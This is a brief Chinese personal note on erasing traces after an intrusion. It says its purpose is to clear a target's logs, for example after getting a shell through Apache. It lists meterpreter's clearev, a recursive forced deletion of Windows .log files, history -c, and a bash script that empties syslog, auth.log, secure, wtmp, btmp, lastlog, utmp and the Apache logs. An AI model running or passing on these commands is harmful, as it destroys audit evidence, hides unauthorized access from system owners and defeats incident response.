本文仅当作记录使用,方便后期查找。
仅本地清理,如果目标服务存在日志服务器的话,所有日志还会被保留。这里仅清理系统相关日志如果访问了某些服务,比如说通过 apache 服务获得一个 shell,你还需要清理apache 服务的访问日志。
windows日志清除
打开cmd输入eventvwr 可打开事件查看器。
在 meterpreter中提供了一条命令clearev可清除日志
删除系统日志目录下的一些日志文件。
del %WINDIR%*.log /a/s/q/f
linux 清除日志
Linux 可能根据发行版本不同,日志文件名称也有所不同,所以具体清除需要大家先看一下目标操作系统;删除日志时注意文件是否有执行权限,而且删除日志一般只有root权限才有。
清除历史命令 history -c
汇总脚本
root@jilu:~# cat clearlog.sh
#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
history -c